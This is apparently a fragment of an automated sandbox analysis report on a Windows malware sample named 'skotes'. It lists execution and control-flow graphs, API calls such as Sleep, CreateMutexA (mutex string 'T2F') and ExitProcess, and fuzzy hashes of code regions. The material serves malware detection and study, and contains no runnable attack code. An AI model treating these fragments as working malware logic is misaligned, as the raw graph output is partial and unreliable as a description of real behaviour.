                                                                                                                                              • Instruction Fuzzy Hash: 46A100B0A017159FDB20DB74D94476AB7E8FF15399F106929EC05F7281EB31EA08CB91
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___free_lconv_mon
                                                                                                                                              • String ID: 8"$`'
                                                                                                                                              • API String ID: 3903695350-1436819768
                                                                                                                                              • Opcode ID: 4106f81d53af0654e6f4e5339c9a7ccfa1d8ebb3526bbc81bceca69307122a99
                                                                                                                                              • Instruction ID: 77f18580705910de45c3dd3cb63eb02e413f964001e53357b864897caab8e816
                                                                                                                                              • Opcode Fuzzy Hash: 4106f81d53af0654e6f4e5339c9a7ccfa1d8ebb3526bbc81bceca69307122a99
                                                                                                                                              • Instruction Fuzzy Hash: A1313731600601EFEB21BA79D845B5B73E8EF4035EF14643AE45DF65A5DE71A8808B21

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:0.9%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:621
                                                                                                                                              Total number of Limit Nodes:4
9882->9875 9884 43690a __cftof 3 API calls 9883->9884 9885 444e11 __cftof 9884->9885 9885->9877 10242 403c8e 10243 403c98 10242->10243 10244 402410 4 API calls 10243->10244 10245 403ca5 10243->10245 10244->10245 10246 403810 3 API calls 10245->10246 10247 403ccf 10246->10247 10248 403810 3 API calls 10247->10248 10249 403cdb shared_ptr 10248->10249 10343 41d111 10345 41d122 10343->10345 10344 41d12a 10345->10344 10347 41d199 10345->10347 10348 41d1a7 SleepConditionVariableCS 10347->10348 10350 41d1c0 10347->10350 10348->10350 10350->10345 10351 402b10 10352 402b1a 10351->10352 10353 402b1c 10351->10353 10354 41c26a 4 API calls 10353->10354 10355 402b22 10354->10355 10464 402b90 10465 402bce 10464->10465 10466 41b7fb TpReleaseWork 10465->10466 10467 402bdb shared_ptr __floor_pentium4 10466->10467 9667 40a856 9668 40a870 9667->9668 9670 40a892 shared_ptr 9667->9670 9669 40a953 Sleep CreateMutexA 9668->9669 9668->9670 9671 40a98e 9669->9671 10309 40215a 10312 41c6fc 10309->10312 10311 402164 10314 41c70c 10312->10314 10315 41c724 10312->10315 10314->10315 10316 41cfbe 10314->10316 10315->10311 10317 41ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 10316->10317 10318 41cfd0 10317->10318 10318->10314 10209 409adc 10210 409aea 10209->10210 10214 409afe shared_ptr 10209->10214 10211 40a917 10210->10211 10210->10214 10212 40a953 Sleep CreateMutexA 10211->10212 10213 40a98e 10212->10213 10215 405c10 3 API calls 10214->10215 10216 409b7c 10215->10216 10223 408b30 10216->10223 10218 409b8d 10219 405c10 3 API calls 10218->10219 10220 409cb1 10219->10220 10221 408b30 3 API calls 10220->10221 10222 409cc2 10221->10222 10224 408b7c 10223->10224 10225 405c10 3 API calls 10224->10225 10227 408b97 shared_ptr 10225->10227 10226 408d01 shared_ptr __floor_pentium4 10226->10218 10227->10226 10228 405c10 3 API calls 10227->10228 10230 408d9a shared_ptr 10228->10230 10229 408e7e shared_ptr __floor_pentium4 10229->10218 10230->10229 10231 405c10 3 API calls 10230->10231 10232 408f1a 
shared_ptr __floor_pentium4 10231->10232 10232->10218 10468 403f9f 10469 403fb6 10468->10469 10470 403fad 10468->10470 10471 402410 4 API calls 10470->10471 10471->10469 10250 4020a0 10251 41c68b __Mtx_init_in_situ 2 API calls 10250->10251 10252 4020ac 10251->10252 10356 404120 10357 40416a 10356->10357 10359 4041b2 Concurrency::details::_ContextCallback::_CallInContext __floor_pentium4 10357->10359 10360 403ee0 10357->10360 10361 403f48 10360->10361 10362 403f1e 10360->10362 10363 403f58 10361->10363 10366 402c00 10361->10366 10362->10359 10363->10359 10367 402c0e 10366->10367 10373 41b847 10367->10373 10369 402c42 10370 402c49 10369->10370 10379 402c80 10369->10379 10370->10359 10372 402c58 std::_Throw_future_error 10374 41b854 10373->10374 10378 41b873 Concurrency::details::_Reschedule_chore 10373->10378 10382 41cb77 10374->10382 10376 41b864 10376->10378 10384 41b81e 10376->10384 10378->10369 10390 41b7fb 10379->10390 10381 402cb2 shared_ptr 10381->10372 10383 41cb92 CreateThreadpoolWork 10382->10383 10383->10376 10385 41b827 Concurrency::details::_Reschedule_chore 10384->10385 10388 41cdcc 10385->10388 10387 41b841 10387->10378 10389 41cde1 TpPostWork 10388->10389 10389->10387 10391 41b807 10390->10391 10392 41b817 10390->10392 10391->10392 10394 41ca78 10391->10394 10392->10381 10395 41ca8d TpReleaseWork 10394->10395 10395->10392 10415 403fe0 10416 404022 10415->10416 10417 4040d2 10416->10417 10418 40408c 10416->10418 10421 404035 __floor_pentium4 10416->10421 10419 403ee0 3 API calls 10417->10419 10422 4035e0 10418->10422 10419->10421 10423 403616 10422->10423 10427 40364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 10423->10427 10428 402ce0 10423->10428 10425 40369e 10426 402c00 3 API calls 10425->10426 10425->10427 10426->10427 10427->10421 10429 402d1d 10428->10429 10430 41bedf InitOnceExecuteOnce 10429->10430 10431 402d46 10430->10431 10432 402d51 __floor_pentium4 10431->10432 10433 402d88 10431->10433 10437 41bef7 10431->10437 
10432->10425 10435 402440 3 API calls 10433->10435 10436 402d9b 10435->10436 10436->10425 10438 41bf03 std::_Throw_future_error 10437->10438 10439 41bf73 10438->10439 10440 41bf6a 10438->10440 10441 402ae0 4 API calls 10439->10441 10444 41be7f 10440->10444 10443 41bf6f 10441->10443 10443->10433 10445 41cc31 InitOnceExecuteOnce 10444->10445 10446 41be97 10445->10446 10447 41be9e 10446->10447 10448 436cbb 3 API calls 10446->10448 10447->10443 10449 41bea7 10448->10449 10449->10443 10472 409ba5 10473 409ba7 10472->10473 10474 405c10 3 API calls 10473->10474 10475 409cb1 10474->10475 10476 408b30 3 API calls 10475->10476 10477 409cc2 10476->10477 9672 436629 9675 4364c7 9672->9675 9676 4364d5 __cftof 9675->9676 9677 436520 9676->9677 9680 43652b 9676->9680 9679 43652a 9686 43a302 GetPEB 9680->9686 9682 436535 9683 43653a GetPEB 9682->9683 9684 43654a __cftof 9682->9684 9683->9684 9685 436562 ExitProcess 9684->9685 9687 43a31c __cftof 9686->9687 9687->9682 10253 405cad 10255 405caf __cftof 10253->10255 10254 405d17 shared_ptr __floor_pentium4 10255->10254 10256 405c10 3 API calls 10255->10256 10257 4066ac 10256->10257 10258 405c10 3 API calls 10257->10258 10259 4066b1 10258->10259 10260 4022c0 3 API calls 10259->10260 10261 4066c9 shared_ptr 10260->10261 10262 405c10 3 API calls 10261->10262 10263 40673d 10262->10263 10264 4022c0 3 API calls 10263->10264 10266 406757 shared_ptr 10264->10266 10265 405c10 3 API calls 10265->10266 10266->10265 10267 4022c0 3 API calls 10266->10267 10268 406852 shared_ptr __floor_pentium4 10266->10268 10267->10266 10269 4042b0 10272 403ac0 10269->10272 10271 4042bb shared_ptr 10273 403af9 10272->10273 10274 4032d0 5 API calls 10273->10274 10276 403c38 10273->10276 10278 403b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10273->10278 10274->10276 10275 4032d0 5 API calls 10279 403c5f 10275->10279 10276->10275 10276->10279 10277 403c68 10277->10271 10278->10271 10279->10277 10280 403810 3 API calls 10279->10280 10281 403cdb 
shared_ptr 10280->10281 10281->10271 10319 403970 10320 41c68b __Mtx_init_in_situ 2 API calls 10319->10320 10321 4039a7 10320->10321 10322 41c68b __Mtx_init_in_situ 2 API calls 10321->10322 10323 4039e6 10322->10323 10324 402170 10325 41c6fc InitializeCriticalSectionEx 10324->10325 10326 40217a 10325->10326 10450 4055f0 10451 405610 10450->10451 10452 4022c0 3 API calls 10451->10452 10453 405710 __floor_pentium4 10451->10453 10452->10451 10454 4043f0 10455 41bedf InitOnceExecuteOnce 10454->10455 10456 40440a 10455->10456 10457 404411 10456->10457 10458 436cbb 3 API calls 10456->10458 10459 404424 10458->10459 10233 419ef0 10234 419f0c 10233->10234 10235 41c68b __Mtx_init_in_situ 2 API calls 10234->10235 10236 419f17 10235->10236 9886 404276 9889 402410 9886->9889 9888 40427f 9890 402424 9889->9890 9893 41b52d 9890->9893 9901 433aed 9893->9901 9895 41b5a5 ___std_exception_copy 9908 41b1ad 9895->9908 9897 41b598 9904 41af56 9897->9904 9900 40242a 9900->9888 9912 434f29 9901->9912 9905 41af9f ___std_exception_copy 9904->9905 9906 41afb2 shared_ptr 9905->9906 9919 41b39f 9905->9919 9906->9900 9909 41b1d8 9908->9909 9911 41b1e1 shared_ptr 9908->9911 9910 41b39f 4 API calls 9909->9910 9910->9911 9911->9900 9914 434f2e __cftof 9912->9914 9913 41b555 9913->9895 9913->9897 9913->9900 9914->9913 9915 43d634 __cftof 3 API calls 9914->9915 9918 438bfc __cftof 9914->9918 9915->9918 9916 4365ed __cftof 3 API calls 9917 438c2f 9916->9917 9918->9916 9920 41bedf InitOnceExecuteOnce 9919->9920 9921 41b3e1 9920->9921 9922 41b3e8 9921->9922 9930 436cbb 9921->9930 9922->9906 9931 436cc7 __dosmaperr 9930->9931 9932 43a671 __cftof 3 API calls 9931->9932 9935 436ccc 9932->9935 9933 438bec __cftof 3 API calls 9934 436cf6 9933->9934 9935->9933 10282 409ab8 10284 409acc 10282->10284 10285 409b08 10284->10285 10286 405c10 3 API calls 10285->10286 10287 409b7c 10286->10287 10288 408b30 3 API calls 10287->10288 10289 409b8d 10288->10289 10290 405c10 3 API calls 10289->10290 10291 409cb1 
10290->10291 10292 408b30 3 API calls 10291->10292 10293 409cc2 10292->10293 9941 40cc79 9943 40cc84 shared_ptr 9941->9943 9942 40ccda shared_ptr __floor_pentium4 9943->9942 9947 405c10 9943->9947 9945 40ce9d 9965 40ca70 9945->9965 9948 405c54 9947->9948 9975 404b30 9948->9975 9950 405d17 shared_ptr __floor_pentium4 9950->9945 9951 405c7b __cftof 9951->9950 9952 405c10 3 API calls 9951->9952 9953 4066ac 9952->9953 9954 405c10 3 API calls 9953->9954 9955 4066b1 9954->9955 9979 4022c0 9955->9979 9957 4066c9 shared_ptr 9958 405c10 3 API calls 9957->9958 9959 40673d 9958->9959 9960 4022c0 3 API calls 9959->9960 9962 406757 shared_ptr 9960->9962 9961 405c10 3 API calls 9961->9962 9962->9961 9963 4022c0 3 API calls 9962->9963 9964 406852 shared_ptr __floor_pentium4 9962->9964 9963->9962 9964->9945 9967 40cadd 9965->9967 9966 40ccda shared_ptr __floor_pentium4 9968 405c10 3 API calls 9967->9968 9973 40cc87 9967->9973 9969 40ccf9 9968->9969 10124 409030 9969->10124 9971 405c10 3 API calls 9972 40ce9d 9971->9972 9974 40ca70 3 API calls 9972->9974 9973->9966 9973->9971 9977 404ce5 9975->9977 9978 404b92 9975->9978 9977->9951 9978->9977 9982 436da6 9978->9982 10008 402280 9979->10008 9983 436db4 9982->9983 9985 436dc2 9982->9985 9987 436d19 9983->9987 9985->9978 9988 43690a __cftof 3 API calls 9987->9988 9989 436d2c 9988->9989 9992 436d52 9989->9992 9991 436d3d 9991->9978 9993 436d8f 9992->9993 9994 436d5f 9992->9994 10003 43b67d 9993->10003 9997 436d6e 9994->9997 9998 43b6a1 9994->9998 9997->9991 9999 43690a __cftof 3 API calls 9998->9999 10000 43b6be 9999->10000 10001 43f1bf __cftof 3 API calls 10000->10001 10002 43b6ce __floor_pentium4 10000->10002 10001->10002 10002->9997 10004 43a671 __cftof 3 API calls 10003->10004 10005 43b688 10004->10005 10006 43b5fb __cftof 3 API calls 10005->10006 10007 43b698 10006->10007 10007->9997 10009 402296 10008->10009 10012 4387f8 10009->10012 10015 437609 10012->10015 10014 4022a4 10014->9957 10016 437649 10015->10016 10020 437631 __cftof 
__dosmaperr __floor_pentium4 10015->10020 10017 43690a __cftof 3 API calls 10016->10017 10016->10020 10018 437661 10017->10018 10021 437bc4 10018->10021 10020->10014 10023 437bd5 10021->10023 10022 437be4 __cftof __dosmaperr 10022->10020 10023->10022 10028 438168 10023->10028 10033 437dc2 10023->10033 10038 437de8 10023->10038 10048 437f36 10023->10048 10029 438171 10028->10029 10031 438178 10028->10031 10057 437b50 10029->10057 10031->10023 10032 438177 10032->10023 10034 437dcb 10033->10034 10036 437dd2 10033->10036 10035 437b50 3 API calls 10034->10035 10037 437dd1 10035->10037 10036->10023 10037->10023 10039 437def 10038->10039 10042 437e09 __cftof __dosmaperr 10038->10042 10041 437fa2 10039->10041 10039->10042 10043 437f69 10039->10043 10045 437f77 10039->10045 10047 437f8b 10041->10047 10071 438390 10041->10071 10042->10023 10043->10045 10043->10047 10075 438241 10043->10075 10045->10047 10079 4386ea 10045->10079 10047->10023 10049 437f4f 10048->10049 10050 437f69 10048->10050 10049->10050 10051 437f77 10049->10051 10054 437fa2 10049->10054 10050->10051 10052 437f8b 10050->10052 10053 438241 3 API calls 10050->10053 10051->10052 10056 4386ea 3 API calls 10051->10056 10052->10023 10053->10051 10054->10052 10055 438390 3 API calls 10054->10055 10055->10051 10056->10052 10058 437b62 __dosmaperr 10057->10058 10061 438ab6 10058->10061 10060 437b85 __dosmaperr 10060->10032 10062 438ad1 10061->10062 10065 438868 10062->10065 10064 438adb 10064->10060 10066 43887a 10065->10066 10067 43690a __cftof GetPEB ExitProcess GetPEB 10066->10067 10070 43888f __cftof __dosmaperr 10066->10070 10069 4388bf 10067->10069 10068 436d52 GetPEB ExitProcess GetPEB 10068->10069 10069->10068 10069->10070 10070->10064 10072 4383ab 10071->10072 10073 4383dd 10072->10073 10083 43c88e 10072->10083 10073->10045 10076 43825a 10075->10076 10090 43d3c8 10076->10090 10078 43830d 10078->10045 10080 43875d __floor_pentium4 10079->10080 10082 438707 10079->10082 10080->10047 10081 43c88e __cftof 3 
API calls 10081->10082 10082->10080 10082->10081 10086 43c733 10083->10086 10085 43c8a6 10085->10073 10087 43c743 10086->10087 10088 43c748 __cftof __dosmaperr 10087->10088 10089 43690a __cftof GetPEB ExitProcess GetPEB 10087->10089 10088->10085 10089->10088 10092 43d3ee 10090->10092 10102 43d3d8 __cftof __dosmaperr 10090->10102 10091 43d485 10094 43d4e4 10091->10094 10095 43d4ae 10091->10095 10092->10091 10093 43d48a 10092->10093 10092->10102 10103 43cbdf 10093->10103 10120 43cef8 10094->10120 10097 43d4b3 10095->10097 10098 43d4cc 10095->10098 10109 43d23e 10097->10109 10116 43d0e2 10098->10116 10102->10078 10104 43cbf1 10103->10104 10105 43690a __cftof GetPEB ExitProcess GetPEB 10104->10105 10106 43cc05 10105->10106 10107 43cef8 GetPEB ExitProcess GetPEB 10106->10107 10108 43cc0d __alldvrm __cftof __dosmaperr _strrchr 10106->10108 10107->10108 10108->10102 10110 43d26c 10109->10110 10111 43d2de 10110->10111 10113 43d2b7 10110->10113 10114 43d2a5 10110->10114 10112 43cf9a GetPEB ExitProcess GetPEB 10111->10112 10112->10114 10115 43d16d GetPEB ExitProcess GetPEB 10113->10115 10114->10102 10115->10114 10117 43d10f 10116->10117 10118 43d14e 10117->10118 10119 43d16d GetPEB ExitProcess GetPEB 10117->10119 10118->10102 10119->10118 10121 43cf10 10120->10121 10122 43cf75 10121->10122 10123 43cf9a GetPEB ExitProcess GetPEB 10121->10123 10122->10102 10123->10122 10125 409080 10124->10125 10126 405c10 3 API calls 10125->10126 10127 40909a shared_ptr __floor_pentium4 10126->10127 10127->9973 10483 438bbe 10484 438868 3 API calls 10483->10484 10485 438bdc 10484->10485

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 342 43652b-436538 call 43a302 345 43655a-43656c call 43656d ExitProcess 342->345 346 43653a-436548 GetPEB 342->346 346->345 347 43654a-436559 346->347 347->345
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(?,?,0043652A,?,?,?,?,?,00437661), ref: 00436567
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: fb80626982b262634caa4b5bf321e071362ad8fbc3e646cd5e86da00f0e14d96
                                                                                                                                              • Instruction ID: 347401e82e2ce368ec67d0b7a1438cb3f98d74491b21c67c5e52476e627dbb70
                                                                                                                                              • Opcode Fuzzy Hash: fb80626982b262634caa4b5bf321e071362ad8fbc3e646cd5e86da00f0e14d96
                                                                                                                                              • Instruction Fuzzy Hash: 84E0CD301401087FCF35BB19D80DD893B6AEF55745F01681AFD1946325CB7DDE41CA44

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 1464230837-3862687658
                                                                                                                                              • Opcode ID: 2bd517f86cc9c56b17f6ece36318f98bbdea54a1f64f6af63bada989ba6cf72f
                                                                                                                                              • Instruction ID: a2ee0a43738e0e879010d75a359999d2292c472e5c233bec0c4700595a4d6dbd
                                                                                                                                              • Opcode Fuzzy Hash: 2bd517f86cc9c56b17f6ece36318f98bbdea54a1f64f6af63bada989ba6cf72f
                                                                                                                                              • Instruction Fuzzy Hash: 25313B71B042008BFB18DB68DD8979DB7B2ABC2310F20863EE014A73D6C77D5981875A

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 22 409f44-409f64 26 409f92-409fae 22->26 27 409f66-409f72 22->27 30 409fb0-409fbc 26->30 31 409fdc-409ffb 26->31 28 409f74-409f82 27->28 29 409f88-409f8f call 41d663 27->29 28->29 36 40a92b 28->36 29->26 32 409fd2-409fd9 call 41d663 30->32 33 409fbe-409fcc 30->33 34 40a029-40a916 call 4180c0 31->34 35 409ffd-40a009 31->35 32->31 33->32 33->36 39 40a00b-40a019 35->39 40 40a01f-40a026 call 41d663 35->40 42 40a953-40a994 Sleep CreateMutexA 36->42 43 40a92b call 436c6a 36->43 39->36 39->40 40->34 51 40a996-40a998 42->51 52 40a9a7-40a9a8 42->52 43->42 51->52 54 40a99a-40a9a5 51->54 54->52
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 1464230837-3862687658
                                                                                                                                              • Opcode ID: 5f929725958bd8730a38da44316df6685d769b60bbbf0485c403cb570bad9e0d
                                                                                                                                              • Instruction ID: 1df7dec1b7803797c04f07b09582047cb315edceb598c142c986f431d2e640d3
                                                                                                                                              • Opcode Fuzzy Hash: 5f929725958bd8730a38da44316df6685d769b60bbbf0485c403cb570bad9e0d
                                                                                                                                              • Instruction Fuzzy Hash: C93127717002049BEB18DB68DD887ADB762EB86314F24863FE018E73D5D77D4990875A

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 56 40a079-40a099 60 40a0c7-40a0e3 56->60 61 40a09b-40a0a7 56->61 64 40a111-40a130 60->64 65 40a0e5-40a0f1 60->65 62 40a0a9-40a0b7 61->62 63 40a0bd-40a0c4 call 41d663 61->63 62->63 66 40a930 62->66 63->60 70 40a132-40a13e 64->70 71 40a15e-40a916 call 4180c0 64->71 68 40a0f3-40a101 65->68 69 40a107-40a10e call 41d663 65->69 76 40a953-40a994 Sleep CreateMutexA 66->76 77 40a930 call 436c6a 66->77 68->66 68->69 69->64 72 40a140-40a14e 70->72 73 40a154-40a15b call 41d663 70->73 72->66 72->73 73->71 85 40a996-40a998 76->85 86 40a9a7-40a9a8 76->86 77->76 85->86 88 40a99a-40a9a5 85->88 88->86
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 1464230837-3862687658
                                                                                                                                              • Opcode ID: 108dfb5e08b11b62366e0982811db5704d32c1e3b546a67ab93984d725565676
                                                                                                                                              • Instruction ID: eafa49c87a8fc05e7a5c16f9c0c5f61d47c02a669d4c54e9ab8eb7b10990d1c4
                                                                                                                                              • Opcode Fuzzy Hash: 108dfb5e08b11b62366e0982811db5704d32c1e3b546a67ab93984d725565676
                                                                                                                                              • Instruction Fuzzy Hash: A93127717002049BEB18DB78CD89BADB762DB86314F24863EE014AB3D5C77D5990875B

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 90 40a1ae-40a1ce 94 40a1d0-40a1dc 90->94 95 40a1fc-40a218 90->95 96 40a1f2-40a1f9 call 41d663 94->96 97 40a1de-40a1ec 94->97 98 40a246-40a265 95->98 99 40a21a-40a226 95->99 96->95 97->96 100 40a935 97->100 104 40a293-40a916 call 4180c0 98->104 105 40a267-40a273 98->105 102 40a228-40a236 99->102 103 40a23c-40a243 call 41d663 99->103 107 40a953-40a994 Sleep CreateMutexA 100->107 108 40a935 call 436c6a 100->108 102->100 102->103 103->98 111 40a275-40a283 105->111 112 40a289-40a290 call 41d663 105->112 119 40a996-40a998 107->119 120 40a9a7-40a9a8 107->120 108->107 111->100 111->112 112->104 119->120 122 40a99a-40a9a5 119->122 122->120
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1738042575.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738084913.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738099533.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738113133.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738126850.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738140020.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738155793.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738169496.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738184429.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738197475.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 1464230837-3862687658
                                                                                                                                              • Opcode ID: 4f88d42c7f84fb5c0731c81d0fa33aa8bb15b47fc617e24147feba342801e66a
                                                                                                                                              • Instruction ID: 714888cdb039a2fff2648d0db7fb0d18f8100137784089f0b748a5d6708c997b
                                                                                                                                              • Opcode Fuzzy Hash: 4f88d42c7f84fb5c0731c81d0fa33aa8bb15b47fc617e24147feba342801e66a
                                                                                                                                              • Instruction Fuzzy Hash: 04312771B002409BEB18DB68DD89BADB762AB86310F24467EE014AB3D1D77D4990875A

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 124 40a418-40a438 128 40a466-40a482 124->128 129 40a43a-40a446 124->129 132 40a4b0-40a4cf 128->132 133 40a484-40a490 128->133 130 40a448-40a456 129->130 131 40a45c-40a463 call 41d663 129->131 130->131 134 40a93f-40a949 call 436c6a * 2 130->134 131->128 138 40a4d1-40a4dd 132->138 139 40a4fd-40a916 call 4180c0 132->139 136 40a492-40a4a0 133->136 137 40a4a6-40a4ad call 41d663 133->137 155 40a94e-40a994 call 436c6a Sleep CreateMutexA 134->155 156 40a949 call 436c6a 134->156 136->134 136->137 137->132 144 40a4f3-40a4fa call 41d663 138->144 145 40a4df-40a4ed 138->145 144->139 145->134 145->144 160 40a996-40a998 155->160 161 40a9a7-40a9a8 155->161 156->155 160->161 162 40a99a-40a9a5 160->162 162->161
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 1464230837-3862687658
                                                                                                                                              • Opcode ID: 06f7df2402c01079666c7f94c8a1f007bd2a2ae193dbf8d6b7f64d6273c0f923
                                                                                                                                              • Instruction ID: 887f34e292501d59d48461a3897491de8c914ce79cb9fcf523fad74bf4edd9d5
                                                                                                                                              • Opcode Fuzzy Hash: 06f7df2402c01079666c7f94c8a1f007bd2a2ae193dbf8d6b7f64d6273c0f923
                                                                                                                                              • Instruction Fuzzy Hash: 29312771B002009BEB18DB78DD8DBADB762EB86314F24862EE014A73D5D7BD4990875B

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 164 40a54d-40a56d 168 40a59b-40a5b7 164->168 169 40a56f-40a57b 164->169 172 40a5e5-40a604 168->172 173 40a5b9-40a5c5 168->173 170 40a591-40a598 call 41d663 169->170 171 40a57d-40a58b 169->171 170->168 171->170 176 40a944-40a949 call 436c6a 171->176 174 40a632-40a916 call 4180c0 172->174 175 40a606-40a612 172->175 178 40a5c7-40a5d5 173->178 179 40a5db-40a5e2 call 41d663 173->179 181 40a614-40a622 175->181 182 40a628-40a62f call 41d663 175->182 191 40a94e-40a994 call 436c6a Sleep CreateMutexA 176->191 192 40a949 call 436c6a 176->192 178->176 178->179 179->172 181->176 181->182 182->174 198 40a996-40a998 191->198 199 40a9a7-40a9a8 191->199 192->191 198->199 200 40a99a-40a9a5 198->200 200->199
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1737893282.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737908217.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737922115.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
